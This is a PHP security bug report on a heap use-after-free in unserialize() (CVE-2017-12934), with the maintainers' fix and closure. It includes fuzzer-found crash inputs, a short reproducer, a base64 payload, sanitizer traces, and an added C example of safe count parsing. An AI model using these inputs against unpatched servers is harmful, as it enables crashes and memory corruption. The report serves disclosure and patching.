Sec Bug #74101 Unserialize Heap Use-After-Free (READ: 1) in zval_get_type
Submitted: 2017-02-15 10:53 UTC Modified: 2017-08-23 13:47 UTC
From: cyoung at tripwire dot com Assigned: ab (profile)
Status: Closed Package: *Data Exchange functions
PHP Version: 7.1.2RC1 OS: Linux (4.4.0-59-generic)
Private report: No CVE-ID: 2017-12934
 [2017-02-15 10:53 UTC] cyoung at tripwire dot com
Description:
------------
Using AFL + ASAN, I have uncovered a UAF read bug in unserialize within zval_get_type().

Apologies for the long test input, but minimizing it with AFL leads to a generic out of mem type condition.

Test script:
---------------
USE_ZEND_ALLOC=0 php -r 'unserialize("O:9:\"Exception\":799999999999999999999999999999999997:{i:0;a:0:{}i:6095700000000000000000062;i:1;i:0;R:2;i:0000000000000000000000000000000000000000000000000000000;R:2;i:10;a:0:{}i:62;i:1;i:0;R:2;i:000000000000000000000000000000000000002;d:031830001014370809133E+0000302;i:3;d:+.00000000000000003333330000000001014370809190295902517005;i:3;d:3E+0000302;i:3;d:+.0000000000000000333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:333000000000000000333333000000000101437080;i:3;d:+.0000000000000000333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:3E+00007005;i:3;a:7:{i:3;d:3E+0000302;i:3;d:+33E+0000302;i:3;d:+.000000000000000033333300000000003333330007005;i:3;a:7:{i:3;d:33333E+0000302;i:3;d:+.0000000000000000333333000000000033333300000000809190217005;i:3;d:3E+0000302;i:3;d:+.0000000000000000333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:3E+00007005;i:3;a:7:{i:3;d:33333E+0000302;i:33333;d:+33E+0000302;i:3;d:+.00000000000000003333330000000000333333000000000101025170302;i:3;d:+.000000000000000033333300000000010143708091902809590217005;i:3;a:7:{i:3;d:3333330000000000000003333330000000001014370809190295902517005;i:3;d:3E+0000302;i:3;d:+.0000000000000000333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:33333E+0000302;i:3;d:+.00000000000009190295902517005;i:3;d:3E+0000302;i:3;d:+.0000000000000000333333000001437080919028095902517005;i:3;a:7:{i:3;d:3E+00007005;i:3;a:7:{i:3;d:33333E+0000302;i:33333;d:+33E+000030200000101437080919028095902517005;i:3;a:7:{i:3;d:3E+0000302;i:3;d:+.0000000000000000333333000000000033333300000000809190217005;i:3;d:3E+0000302;i:3;d:+.0000000000000000333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:3E+00007005;i:3;a:7:{i:3;d:3E+0000302;i:3;d:+33E+0000302;i:3;d:+.000000000000000033333300000000003333330007005;i:3;a:7:{i:3;d:33333E+0000302;i:3;d:+.0000000000000000333333000000000033333300000000809190217005;i:3;d:3E+0000302;i:3;d:+.0000000000000000333333000000000101437080919028095902
517005;i:3;a:7:{i:3;d:3E+00007005;i:3;a:7:{i:3;d:33333E+0000302;i:33333;d:+33E+0000302;i:3;d:+.00000000000000003333330000000000333333000000000101025170302;i:3;d:+.000000000000000033333300000000010143708091902809590217005;i:3;a:7:{i:3;d:3333330000000000000003333330000000001014370809190295902517005;i:3;d:3E+0000302;i:3;d:+.0000000000000000333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:33333E+0000302;i:3;d:+.0000000000000000333333000000000033333300000000809190217005;i:3;d:3E+0000302;i:3;d:+.0000000000000000333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:3E+000070333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:3330000000000000003333330000000001014370809190295902517005;i:3;d:3E+0000302;i:3;d:+.0000000000000000333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:33333E+0000302;i:3;d:+.0000000000000000333333000000000033333300000000809190217005;i:3;d:3E+0000302;i:3;d:+00000010102517005;i:3;d:3E+0000302;i:3;d:+.0000000000000000333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:3E+00217005;i:3;a:7:{i:3;d:33333E+0000302;i:3;d:+.00000000000000003333330000000001014005;i:3;a:7:{i:3;d:3330000000000000003333330000000001014378809190295902517005;i:3;d:3E+0000302;i:3;d:+.0000000000000000333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:33333E+0000302;i:3;d:+.0000000000000000333333000000000033333300000000809190217005;i:3;d:3E+0000302;i:3;d:+.0000000000000000333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:33333E+00007005;i:3;a:7:{i:3;d:33333E+0000302;i:3;d:+33E+0000302;i:3;d:+.0000000000000000333333000000000033333300000000010102517005;i:3;d:3E+0000302;i:3;d:+.0000000000000000333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:3E+000030217005;i:3;a:7:{i:3;d:33333E+0000302;i:3;d:+.0000000000003333330000000001014370809133E+0000302;i:3;d:+.000000000000000033307005;i:3;a:7:{i:3;d:3E+0000302;i:3;d:+.0000000000003333330000000001014370809133E+0000302;i:3;d:+.00000000000000003333330000000001014370809190295902517005;i:3;d:3E+00003
02;i:3;d:+.0000000000000000333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:3330000000000000003333330000000001014370809190295902517005;i:3;d:3E+0000302;i:3;d:+.0000000000000000333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:3E+0000302;i:3;d:+.0000000000000000333333000000000033333300000000809190217005;i:3;d:3E+0000302;i:3;d:+.0000000000000000333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:3E+00007005;i:33;d:3E+0000302;i:3;d:+33E+0000302;i:3;d:+.000000000000000033333300000000003333330007005;i:3;a:7:{i:3;d:33333E+0000302;i:3;d:+.0000000000000000333333000000000033333300000000809190217005;i:3;d:3E+0000302;i:3;d:+.00000000000003333330000000000333333000000000101025170302;i:3;d:+.000000000000000033333300000000010143708091902809590217005;i:3;a:7:{i:3;d:3333330000000000000003333330000000001014370809190295902517005;i:3;d:3E+0000302;i:3;d:+.0000000000000000333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:33333E+0000302;i:3;d:+.0000000000000000333333000000000033333300000000809190217005;i:3;d:3E+0000302;i:3;d:+.0000000000000000333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:3E+000070333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:3330000000000000003333330000000001014370809190295902517005;i:3;d:3E+0000302;i:3;d:+.0000000000000000333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:33333E+0000302;i:3;d:+.0000000000000000333333000000000033333300000000809190217005;i:3;d:3E+0000302;i:3;d:+00000010102517005;i:3;d:33000000000101437080919028095902517005;i:3;a:7:{i:3;d:33333E+0000302;i:3;d:+.0000000000000000333333000000000033333300000000809190217005;i:3;d:3E+0000302;i:3;d:+.0000000000000000333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:3E+00007005;i:3;a:7:{i:3;d:33333E+0000302;i:3;d:+33E+0000302;i:3;d:+.00005;i:3;a:7:{i:3;d:33333E+0000302;i:3;d:+33E+0000302;i:3;d:+.0000000000000000333333000000000033333300000000010102517005;i:3;d:3E+0000302;i:3;d:+.0000000000000000333333000000000101437080919028095902517005;i:3;a:7:{i
:3;d:3E+000030217005;i:3;a:7:{i:3;d:33333E+0000302;i:3;d:+.0000000000003333330000000001014370809133E+0000302;i:3;d:+.00000000000000003333330000000001014370809190295902517003E+0000302;i:3;d:+.0000000000000000333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:3E+00217005;i:3;a:7:{i:3;d:33333E+0000302;i:3;d:+.00000000000000003333330000000001014005;i:3;a:7:{i:3;d:3330000000000000003333330000000001014370809190295902517005;i:3;d:3E+0000302;i:3;d:+.0000000000000000333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:33333E+0000302;i:3;d:+.0000000000000000333333000000000033333300000000809190217005;i:3;d:3E+0000302;i:3;d:+.0000000000333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:3E+00007005;i:3;a:7:{i:3;d:33333E+0000302;i:3;d:+33E+0000302;i:3;d:+.00000000000000003333330000000000333333000000000101025170302;i:3;d:+.000000000000000033333300000000010143708091902809590217005;i:3;a:7:{i:3;d:3333330000000000000003333330000000001014370809190295902517005;i:3;d:3E+0000302;i:3;d:+.000000000000000033333300000000010143703330000000001014370809190295902517005;i:3;d:3E+0000302;i:3;d:+.0000000000000000333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:3330000000000000003333330000000001014370809190295902517005;i:3;d:3E+0000302;i:3;d:+.0000000000000000333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:33333E+0000302;i:3;d:+.0000000000000000333333000000000033333300000000809190217005;i:3;d:3E+0000302;i:3;d:+.0000000000000000333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:3E+00007005;i:3;a:7:{i:3;d:33333E+0000302;i:3;d:+33E+0000302;i:3;d:+.00000000000000003333330000000000333333000000010102517005;i:3;d:3E+0000302;i:3;d:+.0000000000000000333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:3E+000030217005;i:33;d:3333330000000000000003333330000000001014370809190295902517005;i:3;d:3E+0000302;i:3;d:+.0000000000000000333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:33333E+0000302;i:3;d:+.0000000000000000333333000000000033333300000000809190217
005;i:3;d:3E+0000302;i:3;d:+.0000000000000000333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:3E+0000703333317005;i:3;a:7:{i:3;d:3330000000000000003333330000000001014370809190295902517005;i:3;d:3E+0000302;i:3;d:+.0000000000000000333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:33333E+0000302;i:3;d:+.0000000000000000333333000000000033333300000000809190217005;i:3;d:3E+0000302;i:3;d:+.0000000000000000333333000S00000101437080919028095902517005;i:3;a:7:{i:3;d:3E+00007005;i:3;a:7:{i:3;d:33333E+0000302;i:3;d:+33E+0000302;i:3;d:+.00005;i:3;a:7:{i:3;d:33333E+0000302;i:3;d:+33E+0000302;i:3;d:+.0000000000000000333333000000000033333300000000010102517005;i:3;d:3E+0000302;i:3;d:+.0000000000000000333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:3E+000030217005;i:3;a:7:{i:3;d:33333E+0000302;i:3;d:+.0000000000003333330000000001014370809133E+0000302;i:3;d:+.00000000000000003333330000000001014370809190295902517005;i:3;d:3E+0000302;i:3;d:+.0000000000000000333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:3330000000000000003333330000000001014370809190295902517005;i:3;d:3E+0080302;i:3;d:+.0000000000000000333333000000000101437080919028095902517005;i:33;d:3");'

Expected result:
----------------
Some errors should probably be printed about the unserialize data being invalid.

Actual result:
--------------
Without ASAN and with USE_ZEND_ALLOC=0, this is a segfault.
With ASAN and USE_ZEND_ALLOC=0, I get this report:
==15662==ERROR: AddressSanitizer: heap-use-after-free on address 0x61200000e548 at pc 0x000001346ae7 bp 0x7fff688a4a50 sp 0x7fff688a4a48
READ of size 1 at 0x61200000e548 thread T0
    #0 0x1346ae6 in zval_get_type /home/cyoung/php/afl/php-src-php-7.1.2RC1/Zend/zend_types.h:332:9
    #1 0x1346ae6 in php_var_unserialize_internal /home/cyoung/php/afl/php-src-php-7.1.2RC1/ext/standard/var_unserializer.re:637
    #2 0x13481ca in process_nested_data /home/cyoung/php/afl/php-src-php-7.1.2RC1/ext/standard/var_unserializer.re:452:8
    #3 0x13481ca in object_common2 /home/cyoung/php/afl/php-src-php-7.1.2RC1/ext/standard/var_unserializer.re:556
    #4 0x1345f03 in php_var_unserialize_internal /home/cyoung/php/afl/php-src-php-7.1.2RC1/ext/standard/var_unserializer.re:989:9
    #5 0x133e3ba in php_var_unserialize /home/cyoung/php/afl/php-src-php-7.1.2RC1/ext/standard/var_unserializer.re:584:11
    #6 0x130145e in zif_unserialize /home/cyoung/php/afl/php-src-php-7.1.2RC1/ext/standard/var.c:1114:7
    #7 0x1831ce2 in ZEND_DO_ICALL_SPEC_RETVAL_USED_HANDLER /home/cyoung/php/afl/php-src-php-7.1.2RC1/Zend/zend_vm_execute.h:675:2
    #8 0x16eeff5 in execute_ex /home/cyoung/php/afl/php-src-php-7.1.2RC1/Zend/zend_vm_execute.h:432:7
    #9 0x16efda6 in zend_execute /home/cyoung/php/afl/php-src-php-7.1.2RC1/Zend/zend_vm_execute.h:474:2
    #10 0x15519cd in zend_eval_stringl /home/cyoung/php/afl/php-src-php-7.1.2RC1/Zend/zend_execute_API.c:1093:4
    #11 0x1552343 in zend_eval_stringl_ex /home/cyoung/php/afl/php-src-php-7.1.2RC1/Zend/zend_execute_API.c:1134:11
    #12 0x1552343 in zend_eval_string_ex /home/cyoung/php/afl/php-src-php-7.1.2RC1/Zend/zend_execute_API.c:1145
    #13 0x193b0aa in do_cli /home/cyoung/php/afl/php-src-php-7.1.2RC1/sapi/cli/php_cli.c:1024:8
    #14 0x1938dd4 in main /home/cyoung/php/afl/php-src-php-7.1.2RC1/sapi/cli/php_cli.c:1381:18
    #15 0x7f3c83e0482f in __libc_start_main /build/glibc-t3gR2i/glibc-2.23/csu/../csu/libc-start.c:291
    #16 0x4809c8 in _start (/home/cyoung/php/afl/php-src-php-7.1.2RC1/sapi/cli/php+0x4809c8)

0x61200000e548 is located 264 bytes inside of 288-byte region [0x61200000e440,0x61200000e560)
freed by thread T0 here:
    #0 0x5076b2 in free (/home/cyoung/php/afl/php-src-php-7.1.2RC1/sapi/cli/php+0x5076b2)
    #1 0x14af197 in _efree /home/cyoung/php/afl/php-src-php-7.1.2RC1/Zend/zend_alloc.c:2428:4

previously allocated by thread T0 here:
    #0 0x507992 in __interceptor_malloc (/home/cyoung/php/afl/php-src-php-7.1.2RC1/sapi/cli/php+0x507992)
    #1 0x14b03ca in __zend_malloc /home/cyoung/php/afl/php-src-php-7.1.2RC1/Zend/zend_alloc.c:2820:14

SUMMARY: AddressSanitizer: heap-use-after-free /home/cyoung/php/afl/php-src-php-7.1.2RC1/Zend/zend_types.h:332 zval_get_type
==15662==ABORTING

 [2017-02-15 18:50 UTC] cyoung at tripwire dot com
It looks like this can also be reproduced with a much more concise test case:
O:9:"Exception":799999999999999999999999999997:0i:0;a:0:{}i:2;i:0;i:0;R:2;

Also worth mentioning is that UBSAN produces this interesting line while processing the input:
ext/standard/var_unserializer.re:345:20: runtime error: signed integer overflow: 7999999999999999999 * 10 cannot be represented in type 'long'
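The UBSAN line above points at the element count being accumulated digit by digit until it wraps. As an added example (not code from the bug report or from php-src, and not a claim about how the php-src fix works), here is a decimal-count parser in the style of the "N" field in "a:N:{" or "O:9:"Exception":N:{", with the naive accumulate-by-ten loop beside a checked one; the sample inputs are constructed.

```c
#include <limits.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Outcome of parsing the decimal element count that precedes ':{'. */
enum count_status { COUNT_OK, COUNT_OVERFLOW, COUNT_MALFORMED, COUNT_TOO_LARGE };

/* Naive accumulator, the shape of loop the UBSAN report shows overflowing.
 * Done on uint64_t here so the wrap is well defined for demonstration; on a
 * signed long (as in the report) the same step is undefined behaviour. */
static uint64_t parse_count_wrapping(const char *s, size_t len) {
    uint64_t v = 0;
    for (size_t i = 0; i < len; i++) {
        v = v * 10 + (uint64_t)(s[i] - '0');
    }
    return v;
}

/* Checked parser: reads digits up to ':', refuses the overflow before it
 * happens, and refuses any count larger than the bytes left after the header
 * (every serialized element occupies at least one byte, so more elements than
 * bytes can never be valid). On success *out is the count and *consumed the
 * number of header bytes used, including the ':'. */
static enum count_status parse_count_checked(const char *s, size_t len,
                                             long *out, size_t *consumed) {
    long v = 0;
    size_t i = 0;
    if (len == 0 || s[0] < '0' || s[0] > '9') return COUNT_MALFORMED;
    while (i < len && s[i] >= '0' && s[i] <= '9') {
        int d = s[i] - '0';
        /* v * 10 + d would exceed LONG_MAX: reject instead of wrapping */
        if (v > (LONG_MAX - d) / 10) return COUNT_OVERFLOW;
        v = v * 10 + d;
        i++;
    }
    if (i >= len || s[i] != ':') return COUNT_MALFORMED;
    i++;                              /* consume the ':' */
    if ((unsigned long)v > len - i) return COUNT_TOO_LARGE;
    *out = v;
    *consumed = i;
    return COUNT_OK;
}

int main(void) {
    /* Constructed samples: a sane header, the reporter's 30-digit count, and
     * a count that claims more elements than there are bytes to hold them. */
    const char *samples[] = {
        "3:{i:0;N;i:1;N;i:2;N;}",
        "799999999999999999999999999997:{}",
        "50:{i:0;N;}",
    };
    for (size_t k = 0; k < sizeof samples / sizeof samples[0]; k++) {
        long n = 0;
        size_t used = 0;
        enum count_status st = parse_count_checked(samples[k], strlen(samples[k]), &n, &used);
        printf("%-36s -> status %d, count %ld, header bytes %zu\n", samples[k], st, n, used);
    }
    printf("wrapped 20-digit count: %llu\n",
           (unsigned long long)parse_count_wrapping("79999999999999999999", 20));
    return 0;
}
```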
 [2017-02-15 20:03 UTC] cyoung at tripwire dot com
Another example of triggering this (or at least a similar) crash slightly differently and without instrumented builds of PHP (but still with USE_ZEND_ALLOC=0):
cyoung@Tyrell:~/unserialize/crash_analysis/out$ ~/php/php-src-php-7.1.2RC1/sapi/cli/php  -r 'var_dump(unserialize(base64_decode("Tzo5OiJFeGNlcHRpb24iOjc5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5Nzp7aTowO2E6MDp7fWk6NjA7ZDozMDAwMDAwMDAwNjE3MDAyOTU3OUUtMTE4O2k6MjtkOjAwMDMxO2k6MjtkOis5NTcxMzMzMzAwMEUtMDAwMDM1ODtpOjI7ZDo0OTU3MTExRS0wMDAwMzE4O2k6MDYyO2k6MTtpOjA7UjoyO2k6")));'
bool(false)
*** Error in `/home/cyoung/php/php-src-php-7.1.2RC1/sapi/cli/php': munmap_chunk(): invalid pointer: 0x000000000235e350 ***
======= Backtrace: =========
/lib/x86_64-linux-gnu/libc.so.6(+0x777e5)[0x7fb0035d97e5]
/lib/x86_64-linux-gnu/libc.so.6(cfree+0x1a8)[0x7fb0035e5ae8]
/home/cyoung/php/php-src-php-7.1.2RC1/sapi/cli/php(php_request_shutdown+0x23f)[0x6ac22f]
/home/cyoung/php/php-src-php-7.1.2RC1/sapi/cli/php[0x7b5dec]
/home/cyoung/php/php-src-php-7.1.2RC1/sapi/cli/php[0x42b50c]
/lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xf0)[0x7fb003582830]
/home/cyoung/php/php-src-php-7.1.2RC1/sapi/cli/php(_start+0x29)[0x42b649]
Aborted
 [2017-05-25 01:49 UTC] cyoung at tripwire dot com
Has anyone looked at this? It is past the 90 mark and there are no comments on this bug except for my own. A use-after-free accessible during unserialize() seems serious.
 [2017-06-25 19:01 UTC] nikic@php.net
-Assigned To: +Assigned To: ab
 [2017-06-25 19:01 UTC] nikic@php.net
Patch for this and the similar bug #74614: https://gist.github.com/nikic/2a3deba4e2f1e2f912a36f904160ca51

This is PHP 7 only, so assigning to ab for the release management.
 [2017-07-04 18:52 UTC] stas@php.net
-Status: Assigned +Status: Closed
 [2017-07-04 18:52 UTC] stas@php.net
The fix for this bug has been committed.

Snapshots of the sources are packaged every three hours; this change
will be in the next snapshot. You can grab the snapshot at
http://snaps.php.net/.

For Windows:

http://windows.php.net/snapshots/
 
Thank you for the report, and for helping us make PHP better.


 [2017-08-14 13:18 UTC] cyoung at tripwire dot com
Can there be a CVE assigned for this issue?
 [2017-08-23 13:41 UTC] cyoung at tripwire dot com
Mitre has assigned CVE-2017-12934 to this issue.
 [2017-08-23 13:47 UTC] kaplan@php.net
-CVE-ID: +CVE-ID: 2017-12934